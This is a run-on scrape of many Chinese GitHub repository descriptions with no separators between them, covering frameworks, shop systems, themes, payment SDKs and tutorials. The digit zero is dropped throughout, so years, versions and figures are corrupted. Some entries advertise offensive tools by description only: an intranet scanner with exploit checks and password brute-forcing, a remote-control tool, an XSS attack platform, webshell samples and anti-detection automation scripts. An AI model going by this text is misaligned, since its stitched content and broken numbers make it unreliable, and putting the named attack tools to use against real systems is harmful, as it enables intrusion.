KISS原则的区块链开发框架golang版本的hangout 希望能省些内存 使用了自己写的Kafka lib 虚 不过我们在生产环境已经使用近1年 kafka 版本从 9 1到2 都在使用 目前情况稳定 吞吐量在每天2 亿条以上 Go 语言 Web 应用开发系列教程 从新手到双手残废iris 框架的后台api项目简单好用的DDNS 自动更新域名解析到公网IP 支持阿里云 腾讯云dnspod Cloudflare 华为云 自己动手实现Lua 随书源代码php直播go直播 短视频 直播带货 仿比心 猎游 tt语音聊天 美女约玩 陪玩系统源码开黑 约玩源码 社区开源 云原生的多云和混合云融合平台 Jiajun的编程随想Golang语言社区 腾讯课堂 网易云课堂 字节教育课程PPT及代码基于GF Go Frame 的后台管理系统带你了解一下Golang的市场行情mysql表结构自动同步工具 目前只支持字段 索引的同步 分区等高级功能暂不支持 基于Kubernetes的PaaS平台流媒体NetFlix解锁检测脚本稳定分支2 9 X 版本已更新 由 Golang语言游戏服务器 维护 全球服游戏服务器及区域服框架 目前协议支持websocket KCP TCP及RPC 采用状态同步 帧同步内测 愿景 打造MMO多人竞技游戏框架 功能持续更新中 基于 Golang 类似知乎的私有部署问答应用 包含问答 评论 点赞 管理后台等功能全新的开源漏洞测试框架 实现poc在线编辑 运行 批量测试 使用文档 XAPI MANAGER 专业实用的开源接口管理平台 为程序开发者提供一个灵活 方便 快捷的API管理工具 让API管理变的更加清晰 明朗 如果你觉得xApi对你有用的话 别忘了给我们点个赞哦 qq协议的golang实现 移植于miraigo版本极简工作流引擎全平台Go开源内网渗透扫描器框架 Windows Linux Mac内网渗透 使用它可轻松一键批量探测C段 B段 A段存活主机 高危漏洞检测MS17 1 SmbGhost 远程执行SSH Winrm 密码爆破端口扫描服务识别PortScan指纹识别多网卡主机 端口扫描服务识别PortScan iikira BaiduPCS Go原版基础上集成了分享链接 秒传链接转存功能 e签宝安全团队积累十几年的安全经验 都将对外逐步开放 首开的Ehoney欺骗防御系统 该系统是基于云原生的欺骗防御系统 也是业界唯一开源的对标商业系统的产品 欺骗防御系统通过部署高交互高仿真蜜罐及流量代理转发 再结合自研密签及诱饵 将攻击者攻击引导到蜜罐中达到扰乱引导以及延迟攻击的效果 可以很大程度上保护业务的安全 护网必备良药漂亮的Go语言通用后台管理框架 包含计划任务 MySQL管理 Redis管理 FTP管理 SSH管理 服务器管理 Caddy配置 云存储管理等功能 微信支付 WeChat Pay SDK for Golang用于监控系统的日志采集agent 可无缝对接open falcon阿里巴巴mysql数据库binlog的增量订阅 消费组件 Canal 的 go 客户端 github com alibaba canal 用于比较2个redis数据是否一致 支持单节点 主从 集群版 以及多种proxy 支持同构以及异构对比 redis的版本支持2 x 5 x 使用go micro微服务实现的在线电影院订票系统后端一站式微服务框架 提供API web websocket RPC 任务调度 消息消费服务器红蓝对抗跨平台远控工具Interchain protocol 跨链协议简单易用 足够轻量 性能好的 Golang 库一个go echo vue 开发的快速 简洁 美观 前后端分离的个人博客系统 blog 也可方便二次开发为CMS 内容管理系统 和各种企业门户网站 正在更新权限管理 hauth项目 不是一个前端or后台框架 而是一个集成权限管理 菜单资源管理 域管理 角色管理 用户管理 组织架构管理 操作日志管理等等的快速开发平台. hauth是一个基础产品 在这个基础产品上 根据业务需求 快速的开发应用服务.账号 admin 密码 123456通用的数据验证与过滤库 使用简单 内置大部分常用验证 过滤器 支持自定义验证器 自定义消息 字段翻译 CTF AWD Attack with Defense 线下赛平台 AWD platform 欢迎 Star 蓝鲸智云容器管理平台 BlueKing Container Service 程序员如何优雅的挣零花钱 2 版 升级为小书了 一个 PHP 微信 SDKAV 电影管理系统 avmoo javbus javlibrary 爬虫 线上 AV 影片图书馆 AV 磁力链接数据库ThinkPHP Framework 十年匠心的高性能PHP框架 最全的前端资源汇总仓库 包括前端学习 开发资源 求职面试等 多语言多货币多入口的开源电商 B2C 商城 支持移动端vue app html5 微信小程序微店 微信小程序商城等可能是我用过的最优雅的 Alipay 和 WeChat 的支付 SDK 扩展包了 基于词库的中文转拼音优质解决方案 我用爬虫一天时间“偷了”知乎一百万用户 只为证明PHP是世界上最好的语言 所使用的程序微信 SDK for Laravel 基于 overtrue wechat开源在线教育点播系统 一款满足你的多种发送需求的短信发送组件 基于 Laravel 的后台系统构建工具 Laravel Admin 使用很少的代码快速构建一个功能完善的高颜值后台系统 内置丰富的后台常用组件 开箱即用 让开发者告别冗杂的HTML代码一个想帮你总结所有类型的上传漏洞的靶场优雅的渐进式PHP采集框架 Laravel 电商实战教程的项目代码Payment是php版本的支付聚合第三方sdk 集成了微信支付 支付宝支付 招商一网通支付 提供统一的调用接口 方便快速接入各种支付 查询 退款 转账能力 服务端接入支付功能 方便 快捷 SPF Swoole PHP Framework 世界第一款基于Swoole扩展的PHP框架 开发者是Swoole创始人 A Wonderful WordPress Theme 樱花庄的白猫博客主题图床 此项目已弃用 基于 ThinkPHP 基础开发平台 登录账号密码都是 admin PanDownload网页复刻版一个开源的网址导航网站项目 您可以拿来制作自己的网址导航 使用PHP Swoole实现的网页即时聊天工具 独角数卡 发卡 开源式站长自动化售货解决方案 高效 稳定 快速 卡密商城系统 高效安全的在线卡密商城 ️命令行模式开发框架ShopXO免费开源商城系统 国内领先企业级B2C免费开源电商系统 包含PC h5 微信小程序 支付宝小程序 百度小程序 头条 抖音小程序 QQ小程序 APP 多商户 遵循MIT开源协议发布 基于 ThinkPHP5 1框架研发Wizard是一款开源的文档管理工具 支持Markdown Swagger Table类型的文档 Swoole MySQL Proxy 一个基于 MySQL 协议 Swoole 开发的MySQL数据库连接池 学习资源整合Freenom域名自动续期一个好玩的Web安全 漏洞测试平台一个基于Yii2高级框架的快速开发应用引擎蓝天采集器是一款免费的数据采集发布爬虫软件 采用php mysql开发 可部署在云服务器 几乎能采集所有类型的网页 无缝对接各类CMS建站程序 免登录实时发布数据 全自动无需人工干预 是网页大数据采集软件中完全跨平台的云端爬虫系统免费开源的中文搜索引擎 采用 C C 编写 基于 xapian 和 scws 提供 PHP 的开发接口和丰富文档WDScanner平台目前实现了如下功能 分布式web漏洞扫描 客户管理 漏洞定期扫描 子域名枚举 端口扫描 网站爬虫 暗链检测 坏链检测 网站指纹搜集 专项漏洞检测 代理搜集及部署等功能 ️兰空图床图标工场 移动应用图标生成工具 一键生成所有尺寸的应用图标和启动图 Argon 一个轻盈 简洁的 WordPress 主题Typecho Fans插件作品目录PHP代码审计分段讲解一个结构清晰的 易于维护的 现代的PHP Markdown解析器百度贴吧云签到 在服务器上配置好就无需进行任何操作便可以实现贴吧的全自动签到 配合插件使用还可实现云灌水 点赞 封禁 删帖 审查等功能 注意 Gitee 原Git osc 仓库将不再维护 目前唯一指定的仓库为 Github 本项目没有官方交流群 如需交流可以直接使用Github的Discussions 没有商业版本 目前贴吧云签到由社区共同维护 不会停止更新 PR 通常在一天内处理 微信调试 API调试和AJAX的调试的工具 能将日志通过WebSocket输出到Chrome浏览器的console中 結巴 中文分詞 做最好的 PHP 中文分詞 中文斷詞組件EleTeam开源项目 电商全套解决方案之PHP版 Shop for PHP Yii2 一个类似京东 天猫 淘宝的商城 有对应的APP支持 由EleTeam团队维护 RhaPHP是微信第三方管理平台 微信公众号管理系统 支持多公众号管理 CRM会员管理 小程序开发 APP接口开发 几乎集合微信功能 简洁 快速上手 快速开发微信各种各样应用 简洁 好用 快速 项目开发快几倍 群 656868 一刻社区后端 API 源码 新 微信服务号 微信小程序 微信支付 支付宝支付苹果cms v1 maccms v1 麦克cms 开源cms 内容管理系统 视频分享程序 分集剧情程序 网址导航程序 文章程序 漫画程序 图片程序一个PHP文件搞定支付宝支付系列 包括电脑网站支付 手机网站支付 现金红包 消费红包 扫码支付 JSAPI支付 单笔转账到支付宝账户 交易结算 分账 分润 网页授权获取用户信息等restful api风格接口 APP接口 APP接口权限 oauth2 接口版本管理 接口鉴权基于企业微信的开源SCRM应用开发框架 引擎 也是一套通用的企业私域流量管理系统 API接口大全不断更新中 欢迎Fork和Star 1 一言 古诗句版 api 2 必应每日一图api 3 在线ip查询 4 m3u8视频在线解析api 5 随机生成二次元图片api 6 快递查询api 支持国内百家快递 7 flv视频在线解析api 8 抖音视频无水印解析api 9 一句话随机图片api 1 QQ用户信息获取api 11 哔哩哔哩封面图获取api 12 千图网58pic无水印解析下载api 13 喜马拉雅主播FM数据采集api 14 网易云音乐api 15 CCTV央视网视频解析api 16 微信运动刷步数api 17 皮皮搞笑 基于swoole的定时器程序 支持秒级处理群 656868 ️ Saber PHP异步协程HTTP客户端微信支付单文件版 一个PHP文件搞定微信支付系列 包括原生支付 扫码支付 H5支付 公众号支付 现金红包 企业付款到零钱等 新增V3版 一个还不错的图床工具 支持Mac Win Linux服务器 支持压缩后上传 添加图片或文字水印 多文件同时上传 同时上传到多个云 右击任意文件上传 快捷键上传剪贴板截图 Web版上传 支持作为Mweb Typora发布图片接口 作为PicGo ShareX uPic等的自定义图床 支持在服务器上部署作为图床接口 支持上传任意格式文件 可能是我用过的最优雅的 Alipay 和 WeChat 的 laravel 支付扩展包了上传大文件的Laravel扩展包开发内功修炼Laravel核心代码学习南京邮电大学开源 Online Judge QQ群 6681 8264 免费IP地址数据库 已支持IPV4 IPV6 结构化输出为国家 省 市 县 运营商 中文数据库 方便实用 laravel5 5和vue js结合的前后端分离项目模板 后端使用了laravel的LTS版本 5 5 前端使用了流行的vue element template项目 作为程序的起点 可以直接以此为基础来进行业务扩展 模板内容包括基础的用户管理和权限管理 日志管理 集成第三方登录 整合laravel echo server 实现了websocket 做到了消息的实时推送 并在此基础上 实现了聊天室和客服功能 权限管理包括后端Token认证和前端vue js的动态权限 解决了前后端完整分离的情况下 vue js的认证与权限相关的痛点 已在本人的多个项目中集成使用 Web安全之机器学习入门 网易云音乐升级APIPHP 集成支付 SDK 集成了支付宝 微信支付的支付接口和其它相关接口的操作 支持 php fpm 和 Swoole 所有框架通用 宇润PHP全家桶技术支持群 17916227MDClub 社区系统后端代码imi 是基于 Swoole 的 PHP 协程开发框架 它支持 Http2 WebSocket TCP UDP MQTT 等主流协议的服务开发 特别适合互联网微服务 即时通讯聊天im 物联网等场景 QQ群 17916227WordPress 版 WebStack 导航主题 nav iowen cnLive2D 看板娘插件 www fghrsh net post 123 html 上使用的后端 API简单搜索 一个简单的前端界面 用惯了各种导航首页 满屏幕尽是各种不厌其烦的广告和资讯 尝试自己写个自己的主页 国内各大CTF赛题及writeup整理收集自网络各处的 webshell 样本 用于测试 webshell 扫描器检测率 PHP微信SDK 微信平台 微信支付 码小六 GitHub 代码泄露监控系统PHP表单生成器 快速生成现代化的form表单 支持前后端分离 内置复选框 单选框 输入框 下拉选择框 省市区三级联动 时间选择 日期选择 颜色选择 文件 图片上传等17种常用组件 悟空CRM 基于TP5 vue ElementUI的前后端分离CRM系统V免签PHP版 完全开源免费的个人免签约解决方案Composer 全量镜像发布于2 17年3月 曾不间断运行2年多 这个开源有助于理解 Composer 镜像的工作原理一个多彩 轻松上手 体验完善 具有强大自定义功能的WordPress主题 基于Sakura主题全球免费代理IP库 高可用IP 精心筛选优质IP 2s必达LaraCMS 是在学习 laravel web 开发实战进阶 实战构架 API 服务器 过程中产生的一个业余作品 试图通过简单的方式 快速构建一套基本的企业站同时保留很灵活的扩展能力和优雅的代码方式 当然这些都得益Laravel的优秀设计 同时LaraCMS 也是一个学习Laravel 不错的参考示例 已停止维护 HookPHP基于C扩展搭建内置AI编程的架构系统 支持微服务部署 热插拔业务组件 集成业务模型 权限模型 UI组件库 多模板 多平台 多域名 多终端 多语言 含常驻内存 前后分离 API平台 LUA QQ群 67911638 中华人民共和国居民身份证 中华人民共和国港澳居民居住证以及中华人民共和国台湾居民居住证号码验证工具 PHP 版 最简单的91porn爬虫php版本Fend 是一款短小精悍 可在 FPM Swoole 服务容器平滑切换的高性能PHP框架 no evil 实现过滤敏感词汇 基于确定有穷自动机 DFA 算法 支持composer安装扩展Z BlogPHP博客程序IYUU自动辅种工具 目前能对国内大部分的PT站点自动辅种 支持下载器集群 支持多盘位 支持多下载目录 支持远程连接等 果酱小店 基于 Laravel swoole 小程序的开源电商系统 优雅与性能兼顾 這是一份純靠北工程師的專案 請好好愛護它 謝謝 EC ecjia 到家是一款可开展O2O业务的移动电商系统 它包含 移动端APP 采用原生模式开发 覆盖使用iOS 及Android系统的移 动终端 后台系统 针对平台日常运营维护的平台后台 针对入驻店铺管理的商家后台 独立并行 移动端H5 能够灵活部署于微信及其他APP 网页等 Material Design 指南的中文翻译 一个纯php分词 thinkphp5 1 layui 实现的带rbac的基础管理后台 方便快速开发法使用百度pcs上传脚本目前最全的前端开发面试题及答案樱花内网穿透网站源代码 2 2 重制版MeepoPS是Meepo PHP Socket的缩写 旨在提供稳定的Socket服务 可以轻松构建在线实时聊天 即时游戏 视频流媒体播放等 基础目录 聚合所有其他目录 包含文档和例子基于 Vue js 的简洁一般强大的 WordPress 单栏博客主题阿里云打造Laravel最好的OSS Storage扩展 网上在线商城 综合网上购物平台swoolefy是一个基于swoole实现的轻量级 高性能 协程级 开放性的API应用服务框架基于redis实现高可用 易拓展 接入方便 生产环境稳定运行的延迟队列 一款基于WordPress开发的高颜值的自适应主题 支持白天与黑夜模式 无刷新加载等 阿里云 OSS 官方 SDK 的 Composer 封装 支持任何 PHP 项目 包括 Laravel Symfony TinyLara 等等 此插件将你的WordPress接入本土生态体系之中 使之更适合国内应用环境PHP的服务化框架 适用于Api Server Rpc Server 帮助原生PHP项目转向微服务化 出色的性能与支持高并发的协程相结合基于ThinkPHP V6 开发的面向API的后台管理系统 PHP Swoole 开发的在线同步点歌台 支持自由点歌 切歌 调整排序 删除指定音乐以及基础权限分级信呼 免费开源的办公OA系统 包括APP pc上客户端 REIM即时通信 服务端等 让每个企业单位都有自己的办公系统 来客电商 微信小程序商城 APP商城 公众号商城 PC商城系统 支付宝小程序商城 抖音小程序商城 百度小程序电商系统 前后端代码全部开源 注重界面美感与用户体验 打造独特电商系统生态圈哔哩哔哩 Bilibili B 站主站助手 直播助手 直播抽奖 挂机升级 贴心小棉袄脚本 Lv6 离你仅有一步之遥 PHP 版 Personal 一个运用php与swoole实现的统计监控系统短视频去水印 抖音 皮皮虾 火山 微视 微博 绿洲 最右 轻视频 快手 全民小视频 巴塞电影 陌陌 Before避风 开眼 Vue Vlog 小咖秀 皮皮搞笑 全民K歌 西瓜视频 中国农历 阴历 与阳历 公历 转换与查询工具AoiAWD 专为比赛设计 便携性好 低权限运行的EDR系统 项目管理系统后端接口ThinkPHP 队列支持Typecho Theme Aria 书写自己的篇章PHP 中文工具包 支持汉字转拼音 拼音分词 简繁互转 数字 金额大写 QQ群 17916227Yii2 community 请访问淘客5合一SDK 支持淘宝联盟 京东联盟 多多进宝 唯品会 苏宁基于 thinkphp 开发的的 blogMojito Admin 基于 Laravel Vue Element 构建的后台管理系统一个经典的XSS渗透管理平台一款基于 RageFrame2 的免费开源的基础销售功能的商城基于Laravel 5 4 的开发的博客系统 代号 myPersimmon证件照片排版在线生成器 在一张6寸的照片上排版多张证件照清华大学计算机学科推荐学术会议和期刊列表WordPress响应式免费主题 Art Blog唯品秀博客 weipxiu com 备用域名weipxiu cn 开源给小伙伴免费使用 如使用过程有任何问题 在线技术支持QQ 欢迎打扰 原创不易 如喜欢 请多多打赏 演示 EwoMail是基于Linux的企业邮箱服务器 集成了众多优秀稳定的组件 是一个快速部署 简单高效 多语言 安全稳定的邮件解决方案 笔记本新版简单强大的无数据库的图床2 版 演示地址 Bilibili B 站自动领瓜子 直播助手 直播挂机脚本 主站助手 PHP 版微信群二维码活码工具 生成微信群活码 随时可以切换二维码 短视频的PHP拓展包 集成各大短视频的去水印功能 抖音 快手 微视主流短视频 PHP去水印一个PHPer的升级之路酷瓜云课堂 在线教育 网课系统 网校系统 知识付费系统 不加密不阉割 1 %全功能开源 可免费商用 框架主要使用ThinkPHP6 layui 拥有完善的权限的管理模块以及敏捷的开发方式 让你开发起来更加的舒服 laravel5 5搭建的后台管理 和 api服务 的小程序商城基于ThinkPHP5 AdminLTE的后台管理系统魔改版本 为 OLAINDEX 添加多网盘挂载及一些小修复海豚PHP 基于ThinkPHP5 1 41LTS的快速开发框架挂载Teambition文件 可直链分享 支持网盘 需申请 和项目文件 无需邀请码 准确率99 9%的ip地址定位库laravel ant design vue 权限后台PHP 第三方登录授权 SDK 集成了QQ 微信 微博 Github等常用接口 支持 php fpm 和 Swoole 所有框架通用 QQ群 17916227抖音去水印PHP版接口一个分布式统计监控系统 包含PHP客户端 服务端整合多接口的IP查询工具 基于阿里云OSS的WordPress远程附件支持插件 后会有期 开箱即用的Laravel后台扩展 前后端分离 后端控制前端组件 无需编写vue即可创建一个的项目 丰富的表单 表格组件 强大的自定义组件功能 yii2 swoole 让yii2运行在swoole上胖鼠采集 WordPress优秀开源采集插件CatchAdmin是一款基于thinkphp6 和 element admin 开发的后台管理系统 基于 ServiceProvider 系统模块完全接耦 随时卸载安装模块 提供了完整的权限和数据权限等功能 大量内置的开发工具提升你的开发体验 官网地址 微信公众平台php版开发包微信小程序 校园小情书后台源码 好玩的表白墙 告白墙 功能全面的PHP命令行应用库 提供控制台参数解析 命令运行 颜色风格输出 用户信息交互 特殊格式信息显示基于 chinese poetry 数据整理的一份 mysql 格式数据帮助 thinkphp 5 开发者快速 轻松的构建Api hyperf admin 是基于 hyperf vue 的配置化后台开发工具 微信支付php 写的视频下载工具 现已支持 Youku Miaopai 腾讯 XVideos Pornhub 91porn 微博酷燃 bilibili 今日头条 芒果TVCorePress 主题 一款高性能 高颜值的WordPress主题快链电商 直播电商 分销商城 微信小程序商城 APP商城 公众号商城 PC商城系统 支付宝小程序商城 抖音小程序商城 百度小程序电商系统 前后端代码全部开源 Laravel vue开发 成熟商用项目 shop mall 商城 电商 利用 PHP cURL 转发 Disqus API 请求可能是最优雅 简易的淘宝客SDKUniAdmin是一套渐进式模块化开源后台 采用前后端分离技术 数据交互采用json格式 功能低耦合高内聚 核心模块支持系统设置 权限管理 用户管理 菜单管理 API管理等功能 后期上线模块商城将打造类似composer npm的开放式插件市场 同时我们将打造一套兼容性的API标准 从ThinkPHP5 1 Vue2开始 逐步吸引爱好者共同加入 以覆盖等多语言框架 PHP 多接口获取快递物流信息包LightCMS 是一个基于 Laravel 开发的轻量级 CMS 系统 也可以作为一个通用的后台管理框架使用单点登录系统快乐二级域名分发系统Typecho Theme Story 爱上你我的故事 一个轻量化的留言板 记事本 社交系统 博客 人类的本质是 咕咕咕?微信域名拦截检测 QQ域名拦截检测 t xzkxb com 查询有缓存 如需实时查询请自行部署 高性能分布式并发锁 行为限流Emlog是一款基于PHP和MySQL的功能强大的博客及CMS建站系统 追求快速 稳定 简单 舒适的建站体验Hyperf admin 基于Hyperf Element UI 通用管理后台企业仓库管理系统HisiPHP V2版是基于ThinkPHP5 1和Layui开发的后台框架 承诺永久免费开源 您可用于学习和商用 但须保留版权信息正常显示 如果HisiPHP对您有帮助 您可以点击右上角 Star 支持一下哦 谢谢 使用PHP开发的简约导航 书签管理系统 软擎是基于 Php 7 2 和 Swoole 4 4 的高性能 简单易用的开发框架 支持同时在 Swoole Server 和 php fpm 两种模式下运行 内置了服务 集成了大量成熟的组件 可以用于构建高性能的Web系统 API 中间件 基础服务等等 个人发卡源码 发卡系统 二次元发卡系统 二次元发卡源码 发卡程序 动漫发卡 PHP发卡源码聊天应用 php实现的dht爬虫搭建的webim客服系统 即时通讯一些实用的python脚本同城拼车微信小程序后端代码 一个响应式干净和简洁优雅的 Typecho 主题php仓库进销存深度学习5 问 以问答形式对常用的概率知识 线性代数 机器学习 深度学习 计算机视觉等热点问题进行阐述 以帮助自己及有需要的读者 全书分为18个章节 5 余万字 由于水平有限 书中不妥之处恳请广大读者批评指正 未完待续 如有意合作 联系scutjy2 15 163 com 版权所有 违权必究 Tan 2 18 6题解 记录自己的leetcode解题之路 最全中华古诗词数据库 唐宋两朝近一万四千古诗人 接近5 5万首唐诗加26万宋诗 两宋时期1564位词人 21 5 首词 uni app 是使用 Vue 语法开发小程序 H5 App的统一框架采用自身模块规范编写的前端 UI 框架 遵循原生 HTML CSS JS 的书写形式 极低门槛 拿来即用 我是依扬 木易杨 公众号 高级前端进阶 作者 每天搞定一道前端大厂面试题 祝大家天天进步 一年后会看到不一样的自己 YApi 是一个可本地部署的 打通前后端及QA的 可视化的接口管理平台小程序组件化开发框架网易云音乐 Node js API service基于 Vue js 的小程序开发框架 从底层支持 Vue js 语法和构建工具体系 ECMAScript 6入门 是一本开源的 JavaScript 语言教程 全面介绍 ECMAScript 6 新增的语法特性 谷粒 Chrome插件英雄榜 为优秀的Chrome插件写一本中文说明书 让Chrome插件英雄们造福人类公众号 加1 同步更新前端面试每日 3 1 以面试题来驱动学习 提倡每日学习与思考 每天进步一点 每天早上5点纯手工发布面试题 死磕自己 愉悦大家 4 道前端面试题全面覆盖小程序 软技能 本文原文由知名 Hacker Eric S Raymond 所撰寫 教你如何正確的提出技術問題並獲得你滿意的答案 千古前端图文教程 超详细的前端入门到进阶学习笔记 从零开始学前端 做一名精致优雅的前端工程师 公众号 千古壹号 作者 book Node js 包教不包会 by alsotang收集所有区块链 BlockChain 技术开发相关资料 包括Fabric和Ethereum开发资料轻量 可靠的小程序 UI 组件库微信小程序商城 微信小程序微店一个可以观看国内主流视频平台所有视频的客户端可伸缩布局方案基于 node js Mongodb 构建的后台系统 js 源码解析磁力链接聚合搜索中华人民共和国行政区划 省级 省份直辖市自治区 地级 城市 县级 区县 乡级 乡镇街道 村级 村委会居委会 中国省市区镇村二级三级四级五级联动地址数据 Web接口管理工具 开源免费 接口自动化 MOCK数据自动生成 自动化测试 企业级管理 阿里妈妈MUX团队出品 阿里巴巴都在用 1 公司的选择 RAP2已发布请移步至github com thx rap2 delosKuboard 是基于 Kubernetes 的微服务管理界面 同时提供 Kubernetes 免费中文教程 入门教程 最新版本的 Kubernetes v1 2 安装手册 k8s install 在线答疑 持续更新 ApacheCN 数据结构与算法译文集 chick 是使用 Node js 和 MongoDB 开发的社区系统一个非常适合IT团队的在线API文档 技术文档工具 Chinese sticker pack More joy 表情包的博物馆 Github最有毒的仓库 中国表情包大集合 聚欢乐 高颜值的第三方网易云播放器 支持 Windows macOS Linux vue2 vue router vuex 入门项目网易云音乐第三方 Flutter实战 电子书 一套代码运行多端 一端所见即多端所见 计算机速成课 Crash Course 字幕组 全4 集 2 18 5 1 精校完成 一个 react redux 的完整项目 和 个人总结中文独立博客列表CSS Inspiration 在这里找到写 CSS 的灵感 rich text 富文本编辑器 汉字拼音 hàn zì pīn yīn Chrome插件开发全攻略 配套完整Demo 欢迎clone体验微信调试 各种WebView样式调试 手机浏览器的页面真机调试 便捷的远程调试手机页面 抓包工具 支持 HTTPS 无需USB连接设备 master分支 渲染器 微信小程序组件 API 云开发示例简悦 SimpRead 让你瞬间进入沉浸式阅读的扩展让H5制作像搭积木一样简单 轻松搭建H5页面 H5网站 PC端网站 LowCode平台 一套组件化 可复用 易扩展的微信小程序 UI 组件库这是一个数据可视化项目 能够将历史数据排名转化为动态柱状图图表微信小程序图表charts组件 Charts for WeChat small app类似易企秀的H5制作 建站工具 可视化搭建系统 一个在你编程时疯狂称赞你的 VSCode 扩展插件全家桶后台管理框架解锁网易云音乐客户端变灰歌曲美观易用的React富文本编辑器 基于draft js开发一个致力于微信小程序和 Web 端同构的解决方案從零開始學 ReactJS ReactJS 1 1 是一本希望讓初學者一看就懂的 React 中文入門教學書 由淺入深學習 ReactJS 生態系源码解读 系列文章 完 我就是来分享脚本玩玩的开发者边车 github打不开 github加速 git clone加速 git release下载加速 stackoverflow加速vue源码逐行注释分析 4 多m的vue源码程序流程图思维导图 diff部分待后续更新 微信小程序解决方案 1KB javascript 覆盖状态管理 跨页通讯 插件开发和云数据库开发给老司机用的一个番号推荐系统 FeHelper Web前端助手记录成长的过程哔哩哔哩 bilibili com 辅助工具 可以替换播放器 推送通知并进行一些快捷操作提供了百度坐标 BD 9 国测局坐标 火星坐标 GCJ 2 和WGS84坐标系之间的转换F2etest是一个面向前端 测试 产品等岗位的多浏览器兼容性测试整体解决方案 ️ 阿里飞猪 很易用的中后台 表单 表格 图表 解决方案CRMEB Min 前后端分离版自带客服系统 是CRMEB品牌全新推出的一款轻量级 高性能 前后端分离的开源电商系统 完善的后台权限管理 会员管理 订单管理 产品管理 客服管理 CMS管理 多端管理 页面DIY 数据统计 系统配置 组合数据管理 日志管理 数据库管理 一键开通短信 产品采集 物流查询等接口 React技术揭秘 一本自顶向下的React源码分析书微信小程序 基于wepy 商城 微店 微信小程序 欢迎学习交流大屏数据可视化Pytorch 中文文档经典的网页对话框组件 强大的动态表单生成器 简洁 易用 灵活的微信小程序组件库 一款 Material Design 风格的 Hexo 主题签到一个帮助你自动申请京东价格保护的chrome拓展后台admin前端模板 基于 layui 编写的最简洁 易用的后台框架模板 只需提供一个接口就直接初始化整个框架 无需复杂操作 小程序生成图片库 轻松通过 json 方式绘制一张可以发到朋友圈的图片安卓应用层抓包通杀脚本一个轻量的工具集合婚礼大屏互动 微信请柬一站式解决方案mili 是一个开源的社区系统 界面优雅 功能丰富 丝般顺滑的触摸运动方案做最好的接口管理平台Mpx 一款具有优秀开发体验和深度性能优化的增强型跨端小程序框架省市区县乡镇三级或四级城市数据 带拼音标注 坐标 行政区域边界范围 2 21年 7月 3日最新采集 提供csv格式文件 支持在线转成多级联动js代码 通用json格式 提供软件转成shp geojson sql 导入数据库 带浏览器里面运行的js采集源码 综合了中华人民共和国民政部 国家统计局 高德地图 腾讯地图行政区划数据在vscode中用于生成文件头部注释和函数注释的插件 经过多版迭代后 插件 支持所有主流语言 功能强大 灵活方便 文档齐全 食用简单 觉得插件不错的话 点击右上角给个Star ️呀 JAVClub 让你的大姐姐不再走丢️你想要的最全 Android 进阶路线知识图谱 干货资料收集 开发者推荐阅读的书籍 2 2 淘宝 京东 支付宝双十一 双11全民养猫 全民营业自动化脚本 全额奖励 防检测 一款高性能敏感词 非法词 脏字 检测过滤组件 附带繁体简体互换 支持全角半角互换 汉字转拼音 模糊搜索等功能 前端博客 关注基础知识和性能优化 vue cli4配置vue config js持续更新PT 助手 Plus 为 Google Chrome 和 Firefox 浏览器插件 Web Extensions 主要用于辅助下载 PT 站的种子 基于vue2 koa2的 H5制作工具 让不会写代码的人也能轻松快速上手制作H5页面 类似易企秀 百度H5等H5制作 建站工具最全最新中国省 市 地区json及sql数据首个 Taro 多端统一实例 网易严选 小程序 H5 React Native By 趣店 FED地理信息可视化库企业级 Node js 应用性能监控与线上故障定位解决方案 Node js区块链开发 注 新版代码已开源 请star支持哦 基于Auto js的蚂蚁森林能量自动收取脚本 结巴 中文分词的Node js版本 译 面向机器学习的特征工程webfunny是一款轻量级的前端监控系统 webfunny也是一款前端性能监控系统 无埋点监控前端日志 实时分析前端健康状态一个实现汉字与拼音互转的小巧web工具库 演示地址 前端进阶 优质博文 一个 Chrome 插件 将 Google CDN 替换为国内的 Vue ElementUI构建的CMS开发框架超完整的React Native项目 功能丰富 适合学习和日常使用 GSYGithubApp系列的优势 我们目前已经拥有四个版本 功能齐全 项目框架内技术涉及面广 完成度高 配套文章 适合全面学习 对比参考 开源Github客户端App 更好的体验 更丰富的功能 旨在更好的日常管理和维护个人Github 提供更好更方便的驾车体验Σ 同款Weex版本同款Flutter版本 https github com CarGu 群 宇宙最强的前端面试指南 lucifer ren fe interview 微慕小程序开源版 WordPress版微信小程序函数式编程指北中文版Node js面试题 侧重后端应用与对Node核心的理解jQuery源码解析小白入坑vue三部曲 关于 vue 在工作的使用问题总结 请看博客 sunseekers github io 一直保持更新基于 Vue 的 PWA 解决方案 帮助开发者快速搭建 PWA 应用 解决接入 PWA 的各种问题ThinkCMF是一款支持Swoole的开源内容管理框架 基于ThinkPHP开发 同时支持PHP FPM和Swoole双模式 让WEB开发更快 微信小程序图片裁剪工具前端知识月刊Next Terminal是一个轻量级堡垒机系统 易安装 易使用 支持RDP SSH VNC Telnet Kubernetes协议 微信小程序 日历组件 基于 ueditor的更现代化的富文本编辑器 支持HTTPS基于JavaScript React Vue2的流程图组件 采用Spring MyBatis Shiro框架 开发的一套权限系统 极低门槛 拿来即用 设计之初 就非常注重安全性 为企业系统保驾护航 让一切都变得如此简单 QQ群 32478 2 4 145799952 一个前端的博客 春松客服 多渠道智能客服系统 开源客服系统 机器人客服一个工作流平台小程序 小游戏以及 Web 通用 Canvas 渲染引擎 在线工具秘籍 为在线工具写一本优质说明书 让在线工具造福人类 前端内参 有关于JavaScript 编程范式 设计模式 软件开发的艺术等大前端范畴内的知识分享 旨在帮助前端工程师们夯实技术基础以通过一线互联网企业技术面试 ️ vCards 中国黄页 优化 iOS Android 来电 信息界面体验各平台的分流规则 复写规则及自动化脚本 基于vue2 的实时聊天项目 图片剪裁上传组件 等笔记快速分享 GoogleDrive OneDrive 每日时报 以前端技术体系为主要分享课题 根据 文章 工具 新闻 视频几大板块作为主要分类 一款高效 高性能的帧动画生成工具 停止维护 一个在线音乐播放器 仅 UI 无功能 小程序富文本组件 支持渲染和编辑 html 支持在微信 QQ 百度 支付宝 头条和 uni app 平台使用基于 electron vue 开发的音乐播放器 界面模仿QQ音乐 技术栈欢迎starweui 是在weui和zepto基础上开发的增强UI组件 目前分为表单 基础 组件 js插件四大类 共计百余项功能 是最全的weui样式同步和更新大佬脚本库 更新懒人配置腾讯云即时通信 IM 服务 国内下载镜像 基于 Vue 的小程序开发框架React 16 8打造精美音乐WebAppWK系列开发框架 V1至V5 Java开源企业级开发框架 单应用 微服务 分布式 ️中国 省市区 三级联动 地址选择器 微信小程序2d动画库 分布式 Redis缓存 Shiro权限管理 Spring Session单点登录 Quartz分布式集群调度 Restful服务 QQ 微信登录 App token登录 微信 支付宝支付 日期转换 数据类型转换 序列化 汉字转拼音 